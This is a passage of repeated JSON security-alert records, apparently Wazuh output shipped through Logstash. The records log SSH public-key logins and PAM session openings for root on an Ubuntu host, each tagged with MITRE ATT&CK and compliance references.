Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session 